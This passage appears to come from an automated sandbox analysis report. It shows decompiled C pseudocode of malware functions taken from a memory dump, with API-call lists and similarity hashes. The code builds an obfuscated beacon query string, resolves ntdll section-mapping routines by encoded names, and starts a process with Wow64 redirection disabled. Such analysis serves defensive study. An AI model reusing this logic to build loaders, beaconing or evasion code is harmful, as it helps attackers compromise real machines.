                                				intOrPtr _t85;
                                				intOrPtr _t86;
                                				void* _t88;
                                				void* _t91;
                                				intOrPtr _t95;
                                				intOrPtr _t99;
                                				intOrPtr* _t101;
                                				void* _t107;
                                				intOrPtr _t111;
                                				signed int _t115;
                                				char** _t117;
                                				int _t120;
                                				intOrPtr* _t123;
                                				intOrPtr* _t125;
                                				intOrPtr* _t127;
                                				intOrPtr* _t129;
                                				intOrPtr _t132;
                                				intOrPtr _t135;
                                				int _t138;
                                				intOrPtr _t139;
                                				int _t142;
                                				void* _t143;
                                				void* _t144;
                                				void* _t154;
                                				int _t157;
                                				void* _t158;
                                				void* _t159;
                                				void* _t160;
                                				intOrPtr _t161;
                                				void* _t163;
                                				long _t167;
                                				intOrPtr* _t168;
                                				intOrPtr* _t171;
                                				void* _t172;
                                				void* _t174;
                                				void* _t175;
                                				void* _t180;
                                
                                				_t154 = __edx;
                                				_t144 = __ecx;
                                				_t63 = __eax;
                                				_t143 = _a20;
                                				_a20 = 8;
                                				if(__eax == 0) {
                                					_t63 = GetTickCount();
                                				}
                                				_t64 =  *0x481a018; // 0x4934a3dd
                                				asm("bswap eax");
                                				_t65 =  *0x481a014; // 0x5cb11ae7
                                				asm("bswap eax");
                                				_t66 =  *0x481a010; // 0x15dc9586
                                				asm("bswap eax");
                                				_t67 =  *0x481a00c; // 0x69ab8210
                                				asm("bswap eax");
                                				_t68 =  *0x481a2d4; // 0x20bd5a8
                                				_t3 = _t68 + 0x481b613; // 0x74666f73
                                				_t157 = wsprintfA(_t143, _t3, 3, 0x3d15c, _t67, _t66, _t65, _t64,  *0x481a02c,  *0x481a004, _t63);
                                				_t71 = E04816A09();
                                				_t72 =  *0x481a2d4; // 0x20bd5a8
                                				_t4 = _t72 + 0x481b653; // 0x74707526
                                				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
                                				_t174 = _t172 + 0x38;
                                				_t158 = _t157 + _t75;
                                				if(_a8 != 0) {
                                					_t139 =  *0x481a2d4; // 0x20bd5a8
                                					_t8 = _t139 + 0x481b65e; // 0x732526
                                					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
                                					_t174 = _t174 + 0xc;
                                					_t158 = _t158 + _t142;
                                				}
                                				_t76 = E04815040(_t144);
                                				_t77 =  *0x481a2d4; // 0x20bd5a8
                                				_t10 = _t77 + 0x481b302; // 0x6d697426
                                				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
                                				_t81 =  *0x481a2d4; // 0x20bd5a8
                                				_t12 = _t81 + 0x481b7aa; // 0x68d8d52
                                				_t180 = _a4 - _t12;
                                				_t14 = _t81 + 0x481b2d7; // 0x74636126
                                				_t156 = 0 | _t180 == 0x00000000;
                                				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
                                				_t85 =  *0x481a31c; // 0x68d95e0
                                				_t175 = _t174 + 0x1c;
                                				if(_t85 != 0) {
                                					_t135 =  *0x481a2d4; // 0x20bd5a8
                                					_t18 = _t135 + 0x481b8da; // 0x3d736f26
                                					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
                                					_t175 = _t175 + 0xc;
                                					_t160 = _t160 + _t138;
                                				}
                                				_t86 =  *0x481a32c; // 0x68d95b0
                                				if(_t86 != 0) {
                                					_t132 =  *0x481a2d4; // 0x20bd5a8
                                					_t20 = _t132 + 0x481b676; // 0x73797326
                                					wsprintfA(_t160 + _t143, _t20, _t86);
                                					_t175 = _t175 + 0xc;
                                				}
                                				_t161 =  *0x481a37c; // 0x68d9630
                                				_t88 = E04812885(0x481a00a, _t161 + 4);
                                				_t167 = 0;
                                				_v12 = _t88;
                                				if(_t88 == 0) {
                                					L28:
                                					HeapFree( *0x481a290, _t167, _t143);
                                					return _a20;
                                				} else {
                                					_t91 = RtlAllocateHeap( *0x481a290, 0, 0x800);
                                					_a8 = _t91;
                                					if(_t91 == 0) {
                                						L27:
                                						HeapFree( *0x481a290, _t167, _v12);
                                						goto L28;
                                					}
                                					E04812DD0(GetTickCount());
                                					_t95 =  *0x481a37c; // 0x68d9630
                                					__imp__(_t95 + 0x40);
                                					asm("lock xadd [eax], ecx");
                                					_t99 =  *0x481a37c; // 0x68d9630
                                					__imp__(_t99 + 0x40);
                                					_t101 =  *0x481a37c; // 0x68d9630
                                					_t163 = E0481624D(1, _t156, _t143,  *_t101);
                                					_v20 = _t163;
                                					asm("lock xadd [eax], ecx");
                                					if(_t163 == 0) {
                                						L26:
                                						HeapFree( *0x481a290, _t167, _a8);
                                						goto L27;
                                					}
                                					StrTrimA(_t163, 0x48192ac);
                                					_push(_t163);
                                					_t107 = E048121C1();
                                					_v8 = _t107;
                                					if(_t107 == 0) {
                                						L25:
                                						HeapFree( *0x481a290, _t167, _t163);
                                						goto L26;
                                					}
                                					 *_t163 = 0;
                                					__imp__(_a8, _v12);
                                					_t168 = __imp__;
                                					 *_t168(_a8, _v8);
                                					_t111 = E04814AA6( *_t168(_a8, _t163), _a8);
                                					_a4 = _t111;
                                					if(_t111 == 0) {
                                						_a20 = 8;
                                						L23:
                                						E04811492();
                                						L24:
                                						HeapFree( *0x481a290, 0, _v8);
                                						_t167 = 0;
                                						goto L25;
                                					}
                                					_t115 = E048126C9(_t143, 0xffffffffffffffff, _t163,  &_v16);
                                					_a20 = _t115;
                                					if(_t115 == 0) {
                                						_t171 = _v16;
                                						_a20 = E0481161A(_t171, _a4, _a12, _a16);
                                						_t123 =  *((intOrPtr*)(_t171 + 8));
                                						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
                                						_t125 =  *((intOrPtr*)(_t171 + 8));
                                						 *((intOrPtr*)( *_t125 + 8))(_t125);
                                						_t127 =  *((intOrPtr*)(_t171 + 4));
                                						 *((intOrPtr*)( *_t127 + 8))(_t127);
                                						_t129 =  *_t171;
                                						 *((intOrPtr*)( *_t129 + 8))(_t129);
                                						E048150CA(_t171);
                                					}
                                					if(_a20 != 0x10d2) {
                                						L18:
                                						if(_a20 == 0) {
                                							_t117 = _a12;
                                							if(_t117 != 0) {
                                								_t164 =  *_t117;
                                								_t169 =  *_a16;
                                								wcstombs( *_t117,  *_t117,  *_a16);
                                								_t120 = E0481580E(_t164, _t164, _t169 >> 1);
                                								_t163 = _v20;
                                								 *_a16 = _t120;
                                							}
                                						}
                                						goto L21;
                                					} else {
                                						if(_a12 != 0) {
                                							L21:
                                							E048150CA(_a4);
                                							if(_a20 == 0 || _a20 == 0x10d2) {
                                								goto L24;
                                							} else {
                                								goto L23;
                                							}
                                						}
                                						_a20 = _a20 & 0x00000000;
                                						goto L18;
                                					}
                                				}
                                			}


                                APIs
                                • GetTickCount.KERNEL32 ref: 048146E8
                                • wsprintfA.USER32 ref: 04814735
                                • wsprintfA.USER32 ref: 04814752
                                • wsprintfA.USER32 ref: 04814772
                                • wsprintfA.USER32 ref: 04814790
                                • wsprintfA.USER32 ref: 048147B3
                                • wsprintfA.USER32 ref: 048147D4
                                • wsprintfA.USER32 ref: 048147F4
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04814825
                                • GetTickCount.KERNEL32 ref: 04814836
                                • RtlEnterCriticalSection.NTDLL(068D95F0), ref: 0481484A
                                • RtlLeaveCriticalSection.NTDLL(068D95F0), ref: 04814868
                                  • Part of subcall function 0481624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,048170D9,00000000,068D9630), ref: 04816278
                                  • Part of subcall function 0481624D: lstrlen.KERNEL32(00000000,?,00000000,048170D9,00000000,068D9630), ref: 04816280
                                  • Part of subcall function 0481624D: strcpy.NTDLL ref: 04816297
                                  • Part of subcall function 0481624D: lstrcat.KERNEL32(00000000,00000000), ref: 048162A2
                                  • Part of subcall function 0481624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,048170D9,?,00000000,048170D9,00000000,068D9630), ref: 048162BF
                                • StrTrimA.SHLWAPI(00000000,048192AC,?,068D9630), ref: 0481489D
                                  • Part of subcall function 048121C1: lstrlen.KERNEL32(068D87FA,00000000,00000000,00000000,04817100,00000000), ref: 048121D1
                                  • Part of subcall function 048121C1: lstrlen.KERNEL32(?), ref: 048121D9
                                  • Part of subcall function 048121C1: lstrcpy.KERNEL32(00000000,068D87FA), ref: 048121ED
                                  • Part of subcall function 048121C1: lstrcat.KERNEL32(00000000,?), ref: 048121F8
                                • lstrcpy.KERNEL32(00000000,?), ref: 048148BD
                                • lstrcat.KERNEL32(00000000,?), ref: 048148CF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 048148D5
                                  • Part of subcall function 04814AA6: lstrlen.KERNEL32(?,00000000,068D9C98,74ECC740,048113D0,068D9E9D,048155DE,048155DE,?,048155DE,?,63699BC3,E8FA7DD7,00000000), ref: 04814AAD
                                  • Part of subcall function 04814AA6: mbstowcs.NTDLL ref: 04814AD6
                                  • Part of subcall function 04814AA6: memset.NTDLL ref: 04814AE8
                                • wcstombs.NTDLL ref: 04814966
                                  • Part of subcall function 0481161A: SysAllocString.OLEAUT32(00000000), ref: 0481165B
                                  • Part of subcall function 048150CA: HeapFree.KERNEL32(00000000,00000000,04814239,00000000,00000001,?,00000000,?,?,?,04816B8D,00000000,?,00000001), ref: 048150D6
                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 048149A7
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 048149B7
                                • HeapFree.KERNEL32(00000000,00000000,?,068D9630), ref: 048149C7
                                • HeapFree.KERNEL32(00000000,?), ref: 048149D7
                                • HeapFree.KERNEL32(00000000,?), ref: 048149E5
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                • String ID:
                                • API String ID: 972889839-0
                                • Opcode ID: 3bf8a6ef337dccf64f72a5a187015ce2835c2aefbe42f2c37ebcb0e5ada56589
                                • Instruction ID: 6c01c79c524f186f458177fad0c4ccb8708139596670efa243269908fdb15bc3
                                • Opcode Fuzzy Hash: 3bf8a6ef337dccf64f72a5a187015ce2835c2aefbe42f2c37ebcb0e5ada56589
                                • Instruction Fuzzy Hash: 70A17CB1601109EFDB11EFA8DC88E9A3BACEF48754F154922F809D7270D779E950CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 27%
                                			E04815927(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				long _v16;
                                				intOrPtr _v20;
                                				signed int _v24;
                                				void* __esi;
                                				long _t43;
                                				intOrPtr _t44;
                                				intOrPtr _t46;
                                				void* _t48;
                                				void* _t49;
                                				void* _t50;
                                				intOrPtr _t54;
                                				intOrPtr _t57;
                                				void* _t58;
                                				void* _t59;
                                				void* _t60;
                                				intOrPtr _t66;
                                				void* _t71;
                                				void* _t74;
                                				intOrPtr _t75;
                                				void* _t77;
                                				intOrPtr _t79;
                                				intOrPtr* _t80;
                                				intOrPtr _t91;
                                
                                				_t79 =  *0x481a38c; // 0x68d9ba0
                                				_v24 = 8;
                                				_t43 = GetTickCount();
                                				_push(5);
                                				_t74 = 0xa;
                                				_v16 = _t43;
                                				_t44 = E04814E1B(_t74,  &_v16);
                                				_v8 = _t44;
                                				if(_t44 == 0) {
                                					_v8 = 0x48191ac;
                                				}
                                				_t46 = E048142F0(_t79);
                                				_v12 = _t46;
                                				if(_t46 != 0) {
                                					_t80 = __imp__;
                                					_t48 =  *_t80(_v8, _t71);
                                					_t49 =  *_t80(_v12);
                                					_t50 =  *_t80(_a4);
                                					_t54 = E04816837(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                					_v20 = _t54;
                                					if(_t54 != 0) {
                                						_t75 =  *0x481a2d4; // 0x20bd5a8
                                						_t16 = _t75 + 0x481baa8; // 0x530025
                                						 *0x481a138(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                						_push(4);
                                						_t77 = 5;
                                						_t57 = E04814E1B(_t77,  &_v16);
                                						_v8 = _t57;
                                						if(_t57 == 0) {
                                							_v8 = 0x48191b0;
                                						}
                                						_t58 =  *_t80(_v8);
                                						_t59 =  *_t80(_v12);
                                						_t60 =  *_t80(_a4);
                                						_t91 = E04816837(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                						if(_t91 == 0) {
                                							E048150CA(_v20);
                                						} else {
                                							_t66 =  *0x481a2d4; // 0x20bd5a8
                                							_t31 = _t66 + 0x481bbc8; // 0x73006d
                                							 *0x481a138(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                							 *_a16 = _v20;
                                							_v24 = _v24 & 0x00000000;
                                							 *_a20 = _t91;
                                						}
                                					}
                                					E048150CA(_v12);
                                				}
                                				return _v24;
                                			}


                                APIs
                                • GetTickCount.KERNEL32 ref: 0481593C
                                • lstrlen.KERNEL32(?,80000002,00000005), ref: 0481597C
                                • lstrlen.KERNEL32(00000000), ref: 04815985
                                • lstrlen.KERNEL32(00000000), ref: 0481598C
                                • lstrlenW.KERNEL32(80000002), ref: 04815999
                                • lstrlen.KERNEL32(?,00000004), ref: 048159F9
                                • lstrlen.KERNEL32(?), ref: 04815A02
                                • lstrlen.KERNEL32(?), ref: 04815A09
                                • lstrlenW.KERNEL32(?), ref: 04815A10
                                  • Part of subcall function 048150CA: HeapFree.KERNEL32(00000000,00000000,04814239,00000000,00000001,?,00000000,?,?,?,04816B8D,00000000,?,00000001), ref: 048150D6
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: lstrlen$CountFreeHeapTick
                                • String ID:
                                • API String ID: 2535036572-0
                                • Opcode ID: ae7caf65b5677443362a3d311e3508f9d0b07ec9179f387f7a4e5ad74fa838da
                                • Instruction ID: c019d0c4f73be7e444d88e20d1d6b38d94c05235654a3c2370b94bef9886db3f
                                • Opcode Fuzzy Hash: ae7caf65b5677443362a3d311e3508f9d0b07ec9179f387f7a4e5ad74fa838da
                                • Instruction Fuzzy Hash: 5F417A72D00209FFCF11AFA4DC44A9E7BB9EF48318F050952ED04E7221E779AA50EB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 61%
                                			E048151A8(void* __eax, void* __ecx) {
                                				long _v8;
                                				void* _v12;
                                				void* _v16;
                                				void* _v28;
                                				long _v32;
                                				void _v104;
                                				char _v108;
                                				long _t39;
                                				intOrPtr _t43;
                                				intOrPtr _t50;
                                				void* _t52;
                                				intOrPtr _t53;
                                				void* _t61;
                                				intOrPtr* _t66;
                                				intOrPtr* _t73;
                                				intOrPtr* _t76;
                                
                                				_t1 = __eax + 0x14; // 0x74183966
                                				_t71 =  *_t1;
                                				_t39 = E04814F5A(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                				_v8 = _t39;
                                				if(_t39 != 0) {
                                					L12:
                                					return _v8;
                                				}
                                				E048177A4( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
                                				_t43 = _v12(_v12);
                                				_v8 = _t43;
                                				if(_t43 == 0 && ( *0x481a2b8 & 0x00000001) != 0) {
                                					_v32 = 0;
                                					asm("stosd");
                                					asm("stosd");
                                					asm("stosd");
                                					_v108 = 0;
                                					memset( &_v104, 0, 0x40);
                                					_t50 =  *0x481a2d4; // 0x20bd5a8
                                					_t18 = _t50 + 0x481b4a3; // 0x73797325
                                					_t52 = E04816343(_t18);
                                					_v12 = _t52;
                                					if(_t52 == 0) {
                                						_v8 = 8;
                                					} else {
                                						_t53 =  *0x481a2d4; // 0x20bd5a8
                                						_t20 = _t53 + 0x481b770; // 0x68d8d18
                                						_t21 = _t53 + 0x481b0af; // 0x4e52454b
                                						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
                                						if(_t66 == 0) {
                                							_v8 = 0x7f;
                                						} else {
                                							_t73 = __imp__;
                                							_v108 = 0x44;
                                							 *_t73(0);
                                							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
                                							 *_t73(1);
                                							if(_t61 == 0) {
                                								_v8 = GetLastError();
                                							} else {
                                								CloseHandle(_v28);
                                								CloseHandle(_v32);
                                							}
                                						}
                                						HeapFree( *0x481a290, 0, _v12);
                                					}
                                				}
                                				_t76 = _v16;
                                				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
                                				E048150CA(_t76);
                                				goto L12;
                                			}


                                APIs
                                  • Part of subcall function 04814F5A: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,048151C4,?,?,?,?,00000000,00000000), ref: 04814F7F
                                  • Part of subcall function 04814F5A: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04814FA1
                                  • Part of subcall function 04814F5A: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04814FB7
                                  • Part of subcall function 04814F5A: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04814FCD
                                  • Part of subcall function 04814F5A: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04814FE3
                                  • Part of subcall function 04814F5A: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04814FF9
                                • memset.NTDLL ref: 04815212
                                  • Part of subcall function 04816343: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,0481522B,73797325), ref: 04816354
                                  • Part of subcall function 04816343: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0481636E
                                • GetModuleHandleA.KERNEL32(4E52454B,068D8D18,73797325), ref: 04815249
                                • GetProcAddress.KERNEL32(00000000), ref: 04815250
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0481526A
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 04815288
                                • CloseHandle.KERNEL32(00000000), ref: 04815297
                                • CloseHandle.KERNEL32(?), ref: 0481529C
                                • GetLastError.KERNEL32 ref: 048152A0
                                • HeapFree.KERNEL32(00000000,?), ref: 048152BC
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
                                • String ID:
                                • API String ID: 91923200-0
                                • Opcode ID: 5362cca98439e5eb48728a111cf84d6d97fa7241f0540a61365e2921bc70ed21
                                • Instruction ID: fda172122ea509ad2090c2926aeec178d4e4a94a55ad2c881cca81bcfa068f8e
                                • Opcode Fuzzy Hash: 5362cca98439e5eb48728a111cf84d6d97fa7241f0540a61365e2921bc70ed21
                                • Instruction Fuzzy Hash: B63168B2A01219FFDB11AFE4C848ADEBFBCEF48304F104952E505E3120D379AA45DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 64%
                                			E0481624D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                				intOrPtr _v8;
                                				intOrPtr _t9;
                                				intOrPtr _t13;
                                				char* _t28;
                                				void* _t33;
                                				void* _t34;
                                				char* _t36;
                                				void* _t38;
                                				intOrPtr* _t39;
                                				char* _t40;
                                				char* _t42;
                                				char* _t43;
                                
                                				_t34 = __edx;
                                				_push(__ecx);
                                				_t9 =  *0x481a2d4; // 0x20bd5a8
                                				_t1 = _t9 + 0x481b60c; // 0x253d7325
                                				_t36 = 0;
                                				_t28 = E0481278C(__ecx, _t1);
                                				if(_t28 != 0) {
                                					_t39 = __imp__;
                                					_t13 =  *_t39(_t28, _t38);
                                					_v8 = _t13;
                                					_t6 =  *_t39(_a4) + 1; // 0x68d9631
                                					_t40 = E04816837(_v8 + _t6);
                                					if(_t40 != 0) {
                                						strcpy(_t40, _t28);
                                						_pop(_t33);
                                						__imp__(_t40, _a4);
                                						_t36 = E048149FE(_t33, _t34, _t40, _a8);
                                						E048150CA(_t40);
                                						_t42 = E04817565(StrTrimA(_t36, "="), _t36);
                                						if(_t42 != 0) {
                                							E048150CA(_t36);
                                							_t36 = _t42;
                                						}
                                						_t43 = E048152E5(_t36, _t33);
                                						if(_t43 != 0) {
                                							E048150CA(_t36);
                                							_t36 = _t43;
                                						}
                                					}
                                					E048150CA(_t28);
                                				}
                                				return _t36;
                                			}


                                APIs
                                  • Part of subcall function 0481278C: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04816266,253D7325,00000000,00000000,?,00000000,048170D9), ref: 048127F3
                                  • Part of subcall function 0481278C: sprintf.NTDLL ref: 04812814
                                • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,048170D9,00000000,068D9630), ref: 04816278
                                • lstrlen.KERNEL32(00000000,?,00000000,048170D9,00000000,068D9630), ref: 04816280
                                  • Part of subcall function 04816837: RtlAllocateHeap.NTDLL(00000000,00000000,04814197), ref: 04816843
                                • strcpy.NTDLL ref: 04816297
                                • lstrcat.KERNEL32(00000000,00000000), ref: 048162A2
                                  • Part of subcall function 048149FE: lstrlen.KERNEL32(00000000,00000000,048170D9,00000000,?,048162B1,00000000,048170D9,?,00000000,048170D9,00000000,068D9630), ref: 04814A0F
                                  • Part of subcall function 048150CA: HeapFree.KERNEL32(00000000,00000000,04814239,00000000,00000001,?,00000000,?,?,?,04816B8D,00000000,?,00000001), ref: 048150D6
                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,048170D9,?,00000000,048170D9,00000000,068D9630), ref: 048162BF
                                  • Part of subcall function 04817565: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,048162CB,00000000,?,00000000,048170D9,00000000,068D9630), ref: 0481756F
                                  • Part of subcall function 04817565: _snprintf.NTDLL ref: 048175CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                • String ID: =
                                • API String ID: 2864389247-1428090586
                                • Opcode ID: 97c628792b20b10bf827a223b63a449582b88d76d1f3d5419f05390d8a84251a
                                • Instruction ID: a2f15eed2620c48db641d123bdc38746654f4ce5247952ff17c5b497aa88c1ec
                                • Opcode Fuzzy Hash: 97c628792b20b10bf827a223b63a449582b88d76d1f3d5419f05390d8a84251a
                                • Instruction Fuzzy Hash: 0111E3739012257757127BAC9C54C7F369DDF856283054E57F905E7220DEB8EC0297E2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(?), ref: 0481295E
                                • SysAllocString.OLEAUT32(0070006F), ref: 04812972
                                • SysAllocString.OLEAUT32(00000000), ref: 04812984
                                • SysFreeString.OLEAUT32(00000000), ref: 048129E8
                                • SysFreeString.OLEAUT32(00000000), ref: 048129F7
                                • SysFreeString.OLEAUT32(00000000), ref: 04812A02
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 94b56276adf9679101ec9b04ada86e2c4f77281e3be3c8ba1de1375b2a1b2b96
                                • Instruction ID: 2b27f2affa62ddaf14a51ce814060bd3a4fa66f07714872c9a41ccb407cac651
                                • Opcode Fuzzy Hash: 94b56276adf9679101ec9b04ada86e2c4f77281e3be3c8ba1de1375b2a1b2b96
                                • Instruction Fuzzy Hash: F2312C72D00609AFDB01EFACD848A9FB7BAAF49311F144966ED10FB120DB75AD05CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04814F5A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                				intOrPtr _v8;
                                				intOrPtr _t23;
                                				intOrPtr _t26;
                                				_Unknown_base(*)()* _t28;
                                				intOrPtr _t30;
                                				_Unknown_base(*)()* _t32;
                                				intOrPtr _t33;
                                				_Unknown_base(*)()* _t35;
                                				intOrPtr _t36;
                                				_Unknown_base(*)()* _t38;
                                				intOrPtr _t39;
                                				_Unknown_base(*)()* _t41;
                                				intOrPtr _t44;
                                				struct HINSTANCE__* _t48;
                                				intOrPtr _t54;
                                
                                				_t54 = E04816837(0x20);
                                				if(_t54 == 0) {
                                					_v8 = 8;
                                				} else {
                                					_t23 =  *0x481a2d4; // 0x20bd5a8
                                					_t1 = _t23 + 0x481b11a; // 0x4c44544e
                                					_t48 = GetModuleHandleA(_t1);
                                					_t26 =  *0x481a2d4; // 0x20bd5a8
                                					_t2 = _t26 + 0x481b792; // 0x7243775a
                                					_v8 = 0x7f;
                                					_t28 = GetProcAddress(_t48, _t2);
                                					 *(_t54 + 0xc) = _t28;
                                					if(_t28 == 0) {
                                						L8:
                                						E048150CA(_t54);
                                					} else {
                                						_t30 =  *0x481a2d4; // 0x20bd5a8
                                						_t5 = _t30 + 0x481b77f; // 0x614d775a
                                						_t32 = GetProcAddress(_t48, _t5);
                                						 *(_t54 + 0x10) = _t32;
                                						if(_t32 == 0) {
                                							goto L8;
                                						} else {
                                							_t33 =  *0x481a2d4; // 0x20bd5a8
                                							_t7 = _t33 + 0x481b74e; // 0x6e55775a
                                							_t35 = GetProcAddress(_t48, _t7);
                                							 *(_t54 + 0x14) = _t35;
                                							if(_t35 == 0) {
                                								goto L8;
                                							} else {
                                								_t36 =  *0x481a2d4; // 0x20bd5a8
                                								_t9 = _t36 + 0x481b72e; // 0x4e6c7452
                                								_t38 = GetProcAddress(_t48, _t9);
                                								 *(_t54 + 0x18) = _t38;
                                								if(_t38 == 0) {
                                									goto L8;
                                								} else {
                                									_t39 =  *0x481a2d4; // 0x20bd5a8
                                									_t11 = _t39 + 0x481b7a2; // 0x6c43775a
                                									_t41 = GetProcAddress(_t48, _t11);
                                									 *(_t54 + 0x1c) = _t41;
                                									if(_t41 == 0) {
                                										goto L8;
                                									} else {
                                										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                										_t44 = E04814248(_t54, _a8);
                                										_v8 = _t44;
                                										if(_t44 != 0) {
                                											goto L8;
                                										} else {
                                											 *_a12 = _t54;
                                										}
                                									}
                                								}
                                							}
                                						}
                                					}
                                				}
                                				return _v8;
                                			}



















                                APIs
                                  • Part of subcall function 04816837: RtlAllocateHeap.NTDLL(00000000,00000000,04814197), ref: 04816843
                                • GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,048151C4,?,?,?,?,00000000,00000000), ref: 04814F7F
                                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04814FA1
                                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04814FB7
                                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04814FCD
                                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04814FE3
                                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04814FF9
                                  • Part of subcall function 04814248: memset.NTDLL ref: 048142C7
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$AllocateHandleHeapModulememset
                                • String ID:
                                • API String ID: 1886625739-0
                                • Opcode ID: 4656ae204aad5d2bc1ae60d67090fdc29226b1e2f42d914cc53702b35c2d0473
